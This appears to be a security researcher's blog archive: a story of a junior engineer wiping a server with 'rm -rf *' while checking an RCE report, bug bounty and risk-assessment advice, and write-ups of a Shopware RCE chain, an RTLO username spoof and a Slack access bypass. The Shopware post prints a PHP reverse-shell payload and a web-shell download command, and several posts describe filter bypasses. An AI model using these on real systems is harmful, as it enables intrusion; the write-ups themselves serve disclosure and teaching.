Dec, 19th 2020


A few days ago, I identified a severe vulnerability in a private security bug bounty program that enabled remote code execution. A few hours after I submitted the report, I received the answer that they would verify the vulnerability promptly and that they would contact me afterward. Up to this point, it was still routine. But the second answer was tough and was the beginning of an exciting story and, like a domino effect, revealed several problems.

The community reactions to this Story are here:


I've identified a remote code execution and sent them the report with 5 commands and their outputs as proof of concept. Since I didn't want to cause any damage, I decided to use the following commands.

1. "uname -a"
2. "id"
3. "df -h"
4. "ls -alF"
5. "cat / etc / hosts"

The first email response was that they will investigate the report. Then the second response was:

            Dear Dave,
            Thank you for your reports and proof of concepts. We are currently understaffed, so our junior engineer tried to verify your remote code execution and used the command "rm -rf *" to see if the web user can cause serious harm. Unfortunately, he has deleted everything. We will try to recover before we can proceed. We will inform you once the issues are fixed and ask you to verify.

I replied that I will standby and wait for the email.

The third email response was:

        Dear Dave,
        just to give you a status update. We have imported the backups. Unfortunately, we had to find out that we were not performing the backups via cronjob on the system every three days as planned, but inadvertently every three months which means we have now unfortunately irrevocably lost the data from a few weeks on this system. We have now also corrected this error. In the future, we will ensure that we do more pair programming and review with several engineers.

The fourth email response was:

            Dear Dave,
            Thank you for your patience. We have now improved our backup process and imported the backups as far as possible. Meanwhile, our colleagues from the development department fixed the affected vulnerability in the code. We deployed it as a hotfix and rolled it out. Can you please verify it and let us know whether it is now fixed?


I have verified the issue and replied them asking if they would be willing to discuss this case with me in an interview or chat because something like this is very likely to happen to many beginners, which allows you to get the message across and prevent others from making the same mistake committed. To my surprise and absolute delight, they have agreed to do so - provided that neither they nor the company are named.


First of all, I would like to take this opportunity to thank the two engineers concerned for agreeing to conduct this interview with me and for allowing me to quote text passages from previous communication so that we can use this transparency to other engineers for this Being able to sensitize the topic.

Seriously: THANK YOU!

Fearing cyber bullying or hateful comments, the two engineers asked to be allowed to remain anonymous.
Of course, I comply with this request and respect it. We have agreed that we will call the two engineers "Engineer 1" and "Junior Engineer" from now on to create a context.


Welcome to this session. Thank you again for your courage and transparency. If it's okay with you, I will tag one of you each to be clear to whom my question was directed and then ask that person to comment. If there is something that you would not answer or do not want to, let me know, and we'll skip the point.

@secalert asking Junior Engineer:
Dear Junior Engineer, first of all:
How are you? Hopefully, you've calmed down a bit since that mishap. Would you be so kind as to describe the events from your point of view briefly?

@Junior Engineer:
Yes, sure.
First of all, I want to emphasize that I have learned my lesson. I was surprised by your remote code execution and thought that the frameworks or firewalls we were using would recognize and prevent this.
In August I completed my professional training as an IT specialist for application development and have only been dealing with IT security here in the company since November because I was asked if I would like to take a look at the bug bounty program. Due to the current COVID-19 pandemic and the upcoming holidays, we were understaffed in the company. The colleague asked me if I could take care of the bug bounty emails and could also verify the issues if I understood the content. Since I wanted to help, I gladly accepted the offer and was happy that people believed I could do that.
When I read "remote code execution" in your e-mail, I thought it was all about executing code with which you can do some calculator gimmick or possibly leave a picture of the hacking group. I didn't realize that it could do any real damage to the operating system. And since I now had to assess whether the vulnerability is as bad as you wrote in your impact description, I googled it. Then I scanned the pages and just copied and executed a few of the supposedly bad commands because I thought that our frameworks or firewalls would recognize and block this if something really should be alarming. And then I found the "rm -rf *" command. When I realized that something was breaking, it was too late, and I was scared. After a few minutes, I dared to tell my colleague what happened and whether he can help me to fix it again. I'm sorry. I have learned from it, and in the future, I would instead ask my colleagues more often before I do it. That's why I was ready to do this interview and hope that other junior engineers can learn from it and not do something like that too.

Thank you very much for these honest words and the explanation, Junior Engineer.

@secalert asking Engineer 1:
Dear Engineer 1, would you please explain what happened from your perspective and your first reaction was?

@Engineer 1:
Yes, sure.
It wasn't nice of us to put him alone on this important topic. Of course, he immediately accepted when we asked him. But let's be honest: every one of us would have accepted the task as a young person and would have been happy about it. So I want to protect him and take at least 50% of the blame on my head.

So now to the actual question:
When he came to me and told me about the RCE, it was immediately clear that we had to view this as a security incident and focus on it. I navigated to the system and saw straight away that our web application no longer works. I then connected via ssh and saw that the entire applications folder is empty, i.e., the data has been deleted. Since we haven't had to import any backups on this system for a long time, it was clear that we would be sitting on it for a few hours. So I asked a colleague to take care of the backups. I took over the communication directly and answered you first that we take it seriously and immediately take care of it.

My colleague noticed that the backup was a few weeks old and was surprised. We then looked at the systems and backups together and were initially amazed, not to say desperate. We then looked at the files and configurations and then had to regret to find that when we created the cronjob, we had unfortunately not set a backup of this system every three days, but only every three months. Shocking! We lost data for the past few weeks as a result. Luck in misfortune is one of the less critical systems and not our crown jewels. So we learned a lot that day. We have already had internal discussions to ensure that such careless mistakes do not happen again.

We are a company with more than 400 employees and therefore wanted to put our systems' security to the test. We heard about the bug bounty programs at conferences and seminars and thought it could help us better than have an internal security team. Today we learned that it might not be the best idea to take part in a bug bounty program instead of setting up or training your internal security department or at least having someone deeply familiar with the matter. We will discuss this again internally and, if necessary, there is now a possibility due to the latest events.

It was important to me not to gloss over anything, which is why we communicated with you transparently.
And yes: besides the backups, our developers also verified and fixed the issue. Our web site is now more secure. I would also like to thank you for the interview, and I am convinced that some people out there can learn from our incident.

I want to thank you both from the bottom of my heart for the insights and the full transparency. If there is anything I can do for you, please write to me at any time. I wish you and your family a merry Christmas.


I am honest and have to admit that I thought that I was dreaming and that it didn't happen. However, it shows us that we are human and, unfortunately, because of our willingness to help, we are not spared significant mistakes. Each of us started at some point and made one mistake or another. As long as we learn from it, we can always get better. Hopefully, this contribution and the two engineers' openness will help the others prevent such errors from occurring in the first place.

How to react to "it's only a test server" in BBP

Dec, 16th 2020


Every bug bounty hunter sooner or later gets into the situation that a host or a web application is found that is in the scope of the definition of the bug bounty program, but then you read a response like this:

"That's just a test system without real (user-)data, and thus to our company or customers, the evil actor can apply no harm. Therefore we will close this as informative. "

Sometimes they make you as Bounty Hunter feel even worse by adding a sentence like:

"We have protected this server by Basic Auth now."


"We have removed this host."

So, basically they are telling you that there is no issue, but they have fixed it anyway? Sounds "interesting" to me.

And since most of the bug bounty platforms I know, the "Triagers" are unfortunately on the company's side, as the money flows from this side, we bounty hunters hardly have a chance to complain.
But how can one creatively counteract this unjust behavior and learn from it?


Be creative and think of attack scenarios that would be possible with the compromised system!


In the past, an evil actor could exploit open Redirect vulnerabilities to exploit XSS vulnerabilities via this channel using "javascript:," "data:" and other schemes in the context of the page. In modern browsers, this doesn't work anymore. But you can still make use of this for attack scenarios. An open redirect vulnerability can be exploited for Blackhat SEO to better position your own fake/scam pages through strong backlinks in the search engines to cause monetary damage to the company's customers concerned or damage the company's reputation.


The test server/host itself does not contain PII or any other real data. Is it true? What about data like the names of the administrators and employees who have access to this server over ssh? Many companies do have username rules applied like "name.surname@host", and these employees have their folders, bash_history files, which may leak their names as well. With the knowledge of the employees' names and the timestamps when they logged-in to this system last time, your spear-phishing attack or social engineering attack will be more successful. Besides that, an evil actor could compromise this harmless test system and manipulate the ssh-login. Once the employee/admin enters his credentials, these credentials are stored in plaintext, and the evil actor can access it. In the worst-case, the employee reuses the credentials, and thus the evil actor can use these credentials to compromise other systems.


Is this test system really isolated and wholly detached from all other systems in the company? In my experience, this is unfortunately not the case that often. Often there is a tunnel and the possibility of misusing this test system as a jump host and accessing the intranet or other company systems, which then have stored (sensitive) information.


The evil actor can compromise this system and host illegal content, such as Malware, pirated films and software, stolen credit card numbers, or abusive materials. This fact can cause this IP address to receive a bad reputation, which harms the SEO ranking, or the IP address/website gets denied or blocked in the web browser's security features such as SafeBrowsing. Besides that, lawyers could file a law case against the company due to the illegal material!


Is it humanly understandable that the companies concerned often lack the creativity or criminal thoughts to come up with these and other scenarios themselves? Besides, there are "triagers" who are required to process an unbelievable number of reports per day, so that they unfortunately have too little time to come up with every conceivable scenario for each report. Therefore, it is our task to deal with it. We should think about it in advance and instead send in five scenarios and hope that you get at least a bonus for creativity than to be frustrated and sooner or later get away from the bug bounty adventure based on these experiences to adopt.


Okay, that's it.
I hope you can take anything from my blog post or rethink your opinion about the other side of the medal. :)
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

communication in bug bounty programs (as triager, researcher, manager)

Dec, 12th 2020


After an exciting exchange with some people on this topic, I decided to explain my perspective and fact of view because, since 2009, I have been able to learn and to work on the different sides of the security bug bounty world. During this period, I gained experience as a Researcher/Pentester on one side and as a program manager for three companies that operate their private bug bounty program on the other side.


I had many exciting and lively exchanges on both sides of the coin, but I don't want to deny a high level of frustration on both sides.

After a few years dealing with bug bounties, I realized that one could only achieve the right balance if you receive appropriate interpersonal communication training and learn how to communicate gently and with absolute compassion on an interpersonal level.

It is essential always to remain polite and approach the other person with respect and understanding - this is especially true for written texts, as you cannot read the other person's emotions on their face and facial expressions.


In the following section, I would like to show you examples from my own experience that were (a bit) frustrating, how they ultimately turned out and what was needed to defuse the situation as early as possible in human-to-human communication.

1. Everything written here is my personal view and does not represent my employer! :)

2. Thank you to the affected Researcher for permitting me to cite texts from their messages/emails/reports and show the situations and learn from them.

As a "triager" I regularly received reports from Researcher, Pentester, ethical Hacker, Hobbyists and Bug Hunter, which had much potential for improvement. To make things easier in this text I will use the term "Researcher" instead of picking one of the other titles. Since basically anyone can participate in most bug bounty programs without a certificate of education: grammar and spelling are often severely neglected, which is a fact to be accepted.
If the Researcher doesn't understand or poorly understands the attack vector, he/she is about to report; things get tricky.

I received a report regarding a potential CSRF issue. The Researcher wrote the following description:

"CSRF enables the attacker to gain remote access to the admin's desktop and all the files he has stored there."

At this point, I could have rated the ticket as "N/A" or "incomplete" because of this description. But that's not what I want. It is my responsibility to ensure that we can either verify the potential risk or refute its existence. It is always important to me to pursue this and to contribute constructively to the solution. It is also essential to invest the time with colleagues to determine when we introduced the vulnerability and whether an evil actor exploited it in the last 14 days (or for how long you can keep log files in the respective context).

Personally, I have my claim to fulfill an educational mandate.
After verifying the presence of the CSRF vulnerability, I replied to the Researcher.
I told him/her that this attack scenario was exceptional and did not apply to our web application.
Instead, I explained to him/her an attack scenario that applies to us - with the goal and hope that the researcher has a better understanding when he/she reports another CSRF to us next time.

A Researcher reported a race condition which occured under certain rare circumstances that would lock the database access, raise an error and leak internal credentials. The Researcher wrote in imperfect English:

"Hi Sirs and Madams, you have code execution in database I get sugar secrets..."

Again, I could reply with "N/A" or "can't reproduce" and move on.
Instead, I read his/her text three times and had a hard time understanding due to the language barrier, so I looked at the screenshots and python script he/she sent us.
After reading the source code, I had a clue what he/she was trying to achieve, but it did not immediately work as a reliable proof of concept. So I took the time to investigate, reviewed the source code to ensure that it does not contain any backdoor or malicious code and afterwards I ran the script in multiple threads against our all of the database (and replica) servers.

After a while, I could reproduce the issue and finally got the expected results.
It turned out that this was a race condition and only applied to one specific database replica server because it had a different configuration used manually in one case for debugging purposes.
The person in charge forgot to undo the changes after the debugging session.
We could immediately fix the issue.

Once solved, I wrote to the Researcher, told him/her the steps needed to reproduce it, and gave him/her a template which he/she can use for such issues in the future.


As a researcher, I've reported many issues and potential risks to several companies. Sometimes, there was a critique or misunderstanding due to different skills or the language barrier, but it was finally an enjoyable experience and communication. In conclusion, I've had more positive than negative experiences with (private) bug bounty programs.


I remember a case very well where I've received a low bounty due to my initial proof of concept. Three weeks later, the company increased the bounty to the highest amount because their internal security team found other systems affected by the same issue and root cause.


By accident, I've identified a template injection which lead to RCE on a well-known web site. You wonder how? I've visited the website as a customer, and the rendered HTML showed me some errors. My curiosity made me look for the used frameworks. I then downloaded these frameworks and started my research, which finally led to RCEs I've identified and became known as CVE-2016-4977. When I contacted the company and sent them a report with my research, they told me they ran a private bug bounty program and asked me to register for the program. I did so, and after a few days, I got a bounty for these findings. That was pretty generous of them. They could have taken it for free or invite me to the program but tell me that I would not receive a reward because I sent them the report before being part of the program. I am very thankful for how they handled this.


It happened to me three times that I've reported an issue, which they triaged and verified quickly, but then months passed without a reply. Finally, I received the message that this program has ended because it is not active anymore, which meant that I did not receive any reward. Of course, I was very frustrated and tried to involve a Mediator who, in all three cases, told me that there's nothing he/she can do once the company quits the bug bounty program. Finally, I had to accept it and move on.

Are there any lessons learned for me?
Yes, sure. I learned that I have to ask for an update before the six-month period ends, for example, after three months and if they don't reply after four months, kindly ask once again.
This time tell the company that if they don't respond after five months, I will request mediation on the bug bounty platform and hope for a polite treatment.


My recommendations to researchers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Be polite and invest the time to describe an attack scenario that applies to the actual web site/service you have performed a penetration test.

2. whenever possible, include a video as proof of concept, especially if chances are high to run into language barriers.

3. It is nice to know and to be able to reference to "ASVS", "CVSS", "CWE", "D.R.E.A.D.","STRIDE", and similar scoring methods, best practices or standards - but in my experience, to the affected company, it is often more important to have the following questions answered as early as possible in your report:

3.1. are PII (especially "GDPR" article 9) at Risk?

3.2. CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?

3.3. Is user-interaction (victim) needed for a successful exploitation?

3.4. Is authentication needed for an successful exploitation?

My recommendations to Triagers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Please be polite, keep calm and believe in the positive in the human being.
If you think the Researcher is rude: maybe it's only due to the language barrier or lack of skill.

2. Keep in mind that (sensitive) information (i.e. PII) may be at Risk.
If the Researcher did the wrong CVSS rating, maybe the attack vector does not fit best with CVSS. Please don't let this be the only reason for you not to investigate the issue properly. Instead, correct the CVSS and give the issue the importance needed!

3. If you don't understand the issue or it's impact, please take the time to ask your questions to the Researcher.

4. If you come to the conclusion that it is "n/a" or "can't reproduce", please take the time to explain it to the Researcher and if possible give them a hint what they can do better next time.

5. As the triager you have to know which kind of information are at Risk on the vulnerable system. If you don't know, feel free to ask the responsible owner. The Researcher often times will not have internal information such as a full list of protection worthy data, flow diagrams, database schemas, threat models and abuse potential analysis - so forcing them to guess which kind of information "could" be at Risk is a waste of time and will most likely frustrate the Researcher and you as a triager.

My questions to a company that wants to join a (public) security bug bounty program:

1. Are you aware that running a security bug bounty program is very time-consuming?
Most likely, you should plan a full-time employee for this!

2. Do you have employees that have the skills needed to verify the (technical) security issues?

3. Do you have a program manager trained in terms of interpersonal communication, rhetorics and can keep calm? Someone who acts as a mediator if the Researcher is rude or frustrated; to ensure that the situation does not quickly escalate personally?

4. As the responsible owner and person in charge, you have to know which kind of information is at Risk on the vulnerable system. If you don't know, how can you expect the Researcher to know?

5. Please consider sharing information such as a list of protection worthy data, flow diagrams, threat models or abuse potential analysis to the Researchers (with NDA and permission to attack)

6. Are you able to offer a staging system so that the Researcher do not have to penetrate your production systems?
If not please be aware that it can occur that your production system gets harmed.

7. If you want to share the security report with your colleagues in a ticketing system like JIRA, consider sharing a template with the Researcher, so that the researcher can supply you a formatted report. :)

My question to the owner of public bug bounty platforms:

1. Do you treat the companies and the researchers on your platform alike?

2. Do you have trained personnel to mediate and help whenever the communication between the "triager" and the researcher escalates?

3. Do you force the researcher to describe i.e. OWASP Top10 risks over and over again instead of offering them a well-written description for common weaknesses?

Please keep in mind that as a platform, you can take the burden from the shoulders of the researcher and triagers if you offer the opportunity for them to select the description from a drop-down menu instead of letting them describe and potentially falsely represent these issues.

4. Do you encourage the employees of the companies that wants to join your program to learn the basics of (web) security issues before they have their own "triagers" participating in the program?

5. Are you willing to remove a triager or researcher from the program who misbehaves in the communication at any time?

6. Whenever possible: do you offer target scope definitions as configuration files for the most common security tools?


Okay, that's it.
I hope you can take anything from my blog post or rethink your opinion about the other side of the medal. :)
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

How to evolve an alternative approach to risk assessment (Part I)

Dec, 11th 2020


This text aims to present an alternative approach to risk assessment. Unfortunately, many companies neglect risk management and information security because, for example, as a listed company, they have to meet the relevant requirements.
A dedicated employee or a small team is then assigned to this topic and then works on it in isolation. The other departments then come into contact with these colleagues once a year during IT auditing and then fill up entirely by surprise and then feel an inevitable gap that they have to endure.
And how do you bring information security into line with today's fast-paced world of work, for example, in eCommerce, when every feature, no matter how small, is essential not to lose touch with the industry leaders?
How can you ensure no bottleneck in an agile development environment if you want to subject every feature to a thorough security check before going live? Business first / feature first mentality? Business vs. Information Security?
How about, however, if the management firmly believes that information security is an integral part of the relationship of trust with customers and business partners?


In this case, we consider a company with 2,000+ employees. The management prioritizes the importance of information security and data protection and attaches great importance to ensuring that ALL employees receive appropriate basic training.

Develop the value chain and protection requirements

It is important to work out with the management in joint meetings and workshops how the company earns money and what the value chain looks like accordingly. The next step is to relocate the value chain into individual elements and determine the crown jewels. A protected object classification is then required. Once this has been defined, it can be determined together with the management what requirements or protection requirements these protected objects have in terms of confidentiality, integrity and availability. This is used to derive the security priority, the required trust boundaries and the priority with which a security incident can be processed.


Security concerns us all. It is important to sensitize every employee to the topic and explain that each employee is part of the overall concept in information security and that we can only be successful if we work together. All employees are important and must be valued - this also includes mandatory basic training for information security - regardless of whether they work in the IT department, in purchasing, marketing or as a craftsman and caretaker.


As soon as a relationship of trust and openness to information security has been established in the organization, the employees will approach the members of the security team by themselves and ask questions or point out phishing and scam campaigns. It is important to thank these employees for their awareness and express that they are essential to customers, partners, and employees. That is an important milestone.

Next step - decentralized data protection and security management process

What does the company structure and organization chart look like? Are there project managers or product managers? Suppose this is the case, and they are responsible for product development and the implementation of business goals. In that case, it can be worked out with them in dedicated workshops that they are also data owners and are therefore responsible for data protection. If everyone has this common understanding, we can integrate them into decentralized data protection and security management group. At the latest, something will change - namely that the IT revision or the security team no longer proactively approaches the team or product owner and wants to carry out a security audit. Instead, the product owner recognizes the added value and proactively requests security audits and have it carried out.


From the point of view of weak point management, we know established scoring methods and systems such as "CVSS", "D.R.E.A.D.", "S.T.R.I.D.E." and more. However, these are often technical, and one has the feeling that too much subjectivity influences the result. For example, a web security expert will presumably rate the attack vectors "CSRF", "XSS", and "local file exposure" more critically than a thoroughbred system administrator who probably will immediately associate the vulnerability with "remote code execution" or "SQL injection" and then rate it as anything but low per se. So if the technicians already disagree, how should then, especially non-technical product owners, understand the assessment?


First of all, it is essential to note that this proposal introduces a risk management process that is accepted and understood by the workforce and that the responsible owner received the relevant workshop and brief introduction into how to understand the questions and the most important questions. The aim should be to objectively ask a maximum of ten questions that can show the person responsible at a glance whether they must remedy this risk immediately or whether the person responsible can consciously accept the risk for a period of a few weeks in favor of the business priorities.

QUESTIONS TO BE ASKED for a proper RISK evaluation

The following questions do not fit into every context and not every company, but instead represent an example that has worked well for me. It serves only as a suggestion and should by no means be adopted one-to-one. They can be implemented in a web form so that you have the static questions and the answers can be chosen from a drop-down menu or if necessary from a multi-select field.

Are sensitive information at Risk?
YES: trade secrets
YES: intellectual property (i.e. source code)

CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?

Is user-interaction (victim) needed for a successful exploitation?

Is the Risk publicly known?
YES: MITRE, CVE, BLOG, Social Media
YES: external Researcher reported to us
YES: Customer or Partner reported to us

Could we verify the finding with our 5 commonly known sec tool?

Are there log files that we can investigate?

Are detective measures in place?
YES: monitoring
YES: email alerting

Can we immediately apply quick-win remediation until it will be proper fixed?


Based on these 8 questions we can setup a proper risk score evaluation and define numeric values to it which we can then put in addition. In my case, the score will come up to the conclusion that the Risk is "severe" and therefore has to be handled urgent (i.e., within three days) or otherwise the Risk is mediocre and should be taken care of in the next 90 days. In my next blog post (part II) I will guide you through three real-life examples and share the scripts which allows you to automatically get a proper Risk evaluation based on these criterias.

Stay tuned!
Feel free to give me feedback, insights, thoughts on Twitter: @secalert


June, 30th 2020


In this blog post I will write about my thinking processes during the respective security audit and share my failed attempts with you as well. I hope that we can inspire motivate each other in the community to stay tuned and learn from ideas that were not successful in the particular case but can be used in the future in other (corner) cases for success.


We will perform information gathering, bypass filter, abuse a SSRF, discover a zero-day RCE during research and finally exfiltrate sensitive information.


Back in 2016, I had performed a penetration test for which I received minimal information upfront. The goal was to infiltrate the target and access their internal systems or to exfiltrate (sensitive) internal information.

The scope was *!


During the information-gathering phase, I crawled the web site and extracted the frameworks revealed in the HTML source or HTTP response headers. Once this step was finished, I manually reviewed the structures and started to look for version disclosures.

I quickly discovered that the company's blog was WordPress. So one obvious step for me was to check if I can access any admin interfaces or files without login.
That was not the case here, so next I checked the rendered HTML source and found a reference to the "xmlrpc.php" file.

When I tried to access the file, the server returned a "404 not found" error message. Since the file was referenced in the HTML code, I thought that they were probably using a WAF and had the "xmlrpc.php" on a blocked-list for any access from an IP address which is not part of their company network.


So quite naturally, I attempted to bypass the blocked-list by using the following encoding combinations:

1. add a slash to the URL like this ""
2. urlencode the slash once: ""
3. urlencode the slash twice: ""
5. urlencode the slash once and urlencode one other char:
6. urlencode the slash and one other char twice:
"" Success!
The successful condition utilized double URLencoding. The WAF/Application was decoding the user-submitted input only once before performing the string-comparison with the strings in the blocked-list.

So the 6th payload with double URLencoding bypassed their filter, and I now could access the "XMLRPC" controller from an external IP address.

The next step was to check by exploiting the existing endpoint, if it is possible to perform out-of-band HTTP REQUESTS.
Next, I looked if they have an older version of the "XMLRPC" controller in place so that I could use the "" method to make outbound requests to my external server and expose internal IP addresses or other routes that, for example, are not behind a DDoS protection like the one that Cloudflare or AKAMAI offers.

To verify if the "" method is available; I posted a request to list the available methods.

The "" method is available on the target system. Nice!

The next step is to check if we can make out-of-band HTTP requests so that we can potentially abuse this like a Server-side Request Forgery (SSRF) later and use it to gain access to internal hosts and (sensitive) internal information.

next step of

The HTTP request was successful, however I was yet to gain access to any potentially sensitive information. At this point in time, I could enumerate or brute-force internal server names.

I decided to check for internal hostnames by using "" or a similar service, which would help me to quickly identify subdomains or internal-only hosts due to the leak of the hostnames in the public SSL certificates.

I found a few generic sounding subdomains like "", "", "", but I did not know what software was running there. But one that caught my attention was:

Next, I spent my time looking for publicly available exploits in Shopware that would allow me to obtain code execution. However, no exploits were found so I decided to dig down deeper and hunt for zerodays in Shopware by myself.


I decided to download the source code of shopware and hunt for zeroday vulnerabilities. After a couple of hours of research, a remote code execution was identified in the "/backend/Login/load" module. Next, after investigating the root cause and identify the sinks I wrote a proof of concept exploit code for it and verified it on my local Shopware installation so that I can add this exploit to my exploit chain in this pentest.


Now my attack scenario looks like this:
1. bypass the filter to access restricted methods such as "" in the "xmlrpc.php"
2. Use the "" method to make a HTTP GET request to the internal Shopware
3. with the RCE exploit I can finally spawn a reverse shell on the target system or exfiltrate internal information


This is an incomplete Threat Model in order to identify the trust boundaries I had in my mind.


The final chained exploit code looked like in the next screenshot.
So that it can be read easily I've attached it in plaintext in the picture. Hint: The original request was URL-encoded before being sent.

At this point we could also have tried to spawn a reverse-shell like this:
${{`php -r '$sock=fsockopen("",23232);exec("/bin/sh -i <&3 >&3 2>&3");'`}}
or place a web shell on the target system like this:
wget;chmod +x webshell.php
and from this point use the web shell instead of the issue in Shopware.


I had lots of fun while performing this pentest. I was thrilled to find any exploitable issue in Shopware because I was highly motivated to gain access to internal systems and data.
My research of the Shopware source code lead to CVE-2016-3109

After the pentest the target company told me that they were evaluating Shopware on this internal system and had not yet put efforts in protecting it.

Fortunately, there are many talented people in the infosec community today who share their findings with us and blog about them or post them on Twitter. Thanks for that.
You are awesome!

Unfortunately, these posts are sometimes short and focus on the final exploit code and show the happy path without giving more in-depth insights into the researcher's mindset. In my opinion, these thoughts are worth their weight in gold and are incredibly inspiring.

Hopefully, this article gave you insights and motivates you to keep focus and don't give up if you cannot quickly find severe issues in your target scope.


I want to thank the Shopware Team for a very friendly and professional communication when I contacted them and supplied the proof of concept for what later became CVE-2016-3109.

Also I want to thank the following individuals for proof-reading this blog post:


There are a few nice articles about other researches regarding the "xmlrpc" controller: 1.



4. If you know other cool articles, drop me a message and I will add the references :)

from RTLO to alleged admin

JUL, 4th 2020


In this blog post, I want to share a little issue I had first discovered back in 2018 that can be used as part of your Security Awareness campaigns.


I couldn't register as admin or Administrator, so I registered as another user and afterward changed my username using Unicode because I wanted to trick the web application to show it as "administrator" and thus facilitate phishing attacks.


Frequently the registration controller is disabled. I would still recommend to check if it is enabled and accessible when hunting for issues.


The target web site allowed a customer to register and post comments in WordPress located at: .

I had tried to register with familiar names like "admin" or "administrator," which was not allowed. So I tried registering with Unicode look-a-like characters that would look pretty much the same as "admin", but it still a different name. It did not work.

So I registered using "administrators" with a trailing "s". I had received an email for double-opt-in and verified the registration by visiting the link:

side finding:
It is worth mentioning that it is a problem that my username in the "login" param is exposed to 3rd party web sites in cleartext in the HTTP referrer header, which itself could already be a GDPR case.


I've successfully registered as "administrators", but there not much I could to with it because I am still a normal user. So I was wondering if the registration process works the same as the change username process?

I tried to rename my username from "administrators" to "admin". WordPress did not allow me to change to this username.


Next I thought about RTLO (right-to-left override) which is U+202E in Unicode.

So I tried to rename it to:

which consists of %E2%80%AE which is the URLencoded string of the RTLO sequence and rotartsinimda which is the reversed string of "administrator".
This was accepted.

Next I then navigated to the comment section to verify if the RTLO has worked or the web application shows my username as rotartsinimda.

The RTLO sequence worked, and in the web browser, it was successfully parsed and was shown as "administrator".
This fact facilitates phishing attacks because an average user would trust if an administrator posts a comment such as "Your session has Please click here to relogin" with a link pointing to an attacker-controlled domain like or similar.


In fact, it is a low-Risk issue, but in my opinion, it can be used as an "eye-catcher" in your Security Awareness campaign.


I want to thank the private bug bounty programs for the bounties and therefore the opportunity to donate it to needy humans who well deserves our help.


Slack, a brief journey to mission control

Oct, 20th 2016


In this blog post, I will describe my thoughts while hunting for security issues as part of Slack's bug bounty program which resulted in the findings of and

Thanks to the Slack security team

I want to thank Leigh Honeywell and Max Feldman of the Slack security team for the gentle, professional communication and coordination in the bug reporting process.

Information gathering

To understand the infrastructure and gain information about the used framework, I started to check the HTTP response header. I saw that Slack is using an Apache httpd server. So I tried to identify common Apache directories and directives like /icons/README, /manual/, /server-info and /server-status.

May I access your internal data, please?

Slack runs mod_status on the web server. The Status module allows a server administrator to find out how well their server is performing and which resources have been requested by which ip addresses. An attacker may make use of this information to craft an attack against the web server.

When I tried to access server-status directive, the server redirected me to a login page located on the * domain. So this path has been protected.

Out of scope domain! Now what?

If you are lazy, be warned that brute-force is not permitted by the Slack bug bounty program's rules. So one would now try to bypass the login page with some injection techniques, but unfortunately, the login page itself is located on a FQDN outside of the allowed scope, so this was not an option. I had to find a way to stay within the allowed scope of

Routing? Filter? - Blind testing

First of all, I thought, that if they are using Apache httpd and mod_status, the redirect could be triggered using the rewrite module. The mod_rewrite module is a powerful module for Apache used for rewriting URLs on the fly. However, with such power come associated risks; it is easy to make mistakes when configuring mod_rewrite, which can turn into security issues. Take, for example, one of the configurations in the mod_rewrite documentation:

RewriteRule ^/somepath(.*) /otherpath$1 [R]
If this is the case, they could probably have misconfigured the RewriteRule and therefore I could bypass it by simply adding a slash. Why? Requesting
will redirect and return the page http://yourserver/otherpath/secalert as expected. However, requesting
will bypass this particular RewriteRule. In case of Slack it was not possible to bypass it this way. So I had to think outside the box.

I was playing around with representations of a slash in order to potentially bypass a simple string based filter protection.
I played around with the RTLO sequence in order to bypass the filter by submitting the RTLO sequence followed by the reversed string.{u+202e here}sutats-revres
which did not work at first.

Access control bypass!

After a few tests I thought, that they could use a Route Map in their framework and that I potentially could bypass the routing mechanism or access control by adding multiple forward slashes in case that the applied filter checks if the string starts with a particular string and does strip a forward slash, but eventually miss to strip all slashes recursively, and this finally worked.

Bounty as low as $50?

While writing the report for Slack on hackerone I decided to add some screenshots as proof of concept. At this point I thought that I would earn the minimum bounty of $50 for reporting this misconfiguration issue, because the server-status file usually would not expose any sensitive information to me if the requested resources are part of my own Slack workspace, right? Well, i logged out of my Slack account and requested the server status without being logged in! That means that an attacker would potentially gain unauthorized access to the requested resources of ANY Slack site by accessing the server-status directive of a given workspace!

Secrets exposed, increased bounty!

I realised that there are some requests listed like /callbacks/chat.php?secret=... and /users.list?token=... ,which definitely are sensitive data. So I added some screenshots, which most probably increased the bounty I finally received. Thanks again to Slack for that generous bounty.

Google indexing

After receiving the first bounty from Slack, which has been generous, I was motivated to hunt for further issues. I googled for common file extensions on the Slack web sites and found cached URLs, which indicates that Slack does have or had a back-end admin panel, which Google indexed in the past. When I tried to access these pages, I got redirected to the login page once again. But since Slack resolved the prior reported issue, chances were low, right?

Backend access -> second bounty!

The Slack employees have access to a backend admin panel called mission control. In the mission control panel, authorized people can read lots of meta data related to Slack user and Slack workspace by passing an id to the corresponding controller. Since the needed "id" is being exposed in the rendered HTML of my Slack workspace, I read the metadata associated with my own account and sent these screenshots to the Slack security team. Besides that, it was identified that an attacker would be enabled to reset the password of any user by guessing their "id" and passing a request to the associated reset controller in the mission control panel. This would allow an attacker to take over any account! For this issue, I received an additional bounty.


Be patient! Sometimes you may identify a flaw that seems to be trivial from a technical point of view, but may raise a high business impact or an increased data privacy issue to the affected company, so that they could rate the risks different than you initially thought.

Apr, 11th 2016: issue identified and reported
        Apr, 11th 2016: verified by slack
        Apr, 13th 2016: issue fixed
        Apr, 13th 2016: received a bounty of $2000 for
        Apr, 14th 2016: identified and reported second issue
        Apr, 14th 2016: issue verified by slack
        Apr, 24th 2016: issue has been globally fixed
        Apr, 24th 2016: additional bounty of $7000 for
        Oct, 20th 2016: this write-up has been published

CVE-2016-4977: RCE in Spring Security OAuth 1&2

Oct, 13th 2016

Affected version

  • Pivotal Spring Security OAuth 2.0 - 2.0.9
  • Pivotal Spring Security OAuth 1.0 - 1.0.5


A couple of months ago, I performed a security audit against a web application that used the Spring Security OAuth framework for authorization. During my research, I have identified some issues, including remote code execution flaws. The web application implemented the Spring Security OAuth framework, which comes by default with a template prone to RCE! One would believe that this one is secure by default, but indeed it was not. During my research, I realized that a couple of well-known websites also implemented the vulnerable code.

Spring Boot Demo

If you want to verify the issue yourself, you can download the spring boot demo application as a maven project from

Let's get started

Usually one would run the demo application by passing a legit request like:

Everything works as intended. I then started to look for common issues like XSS:

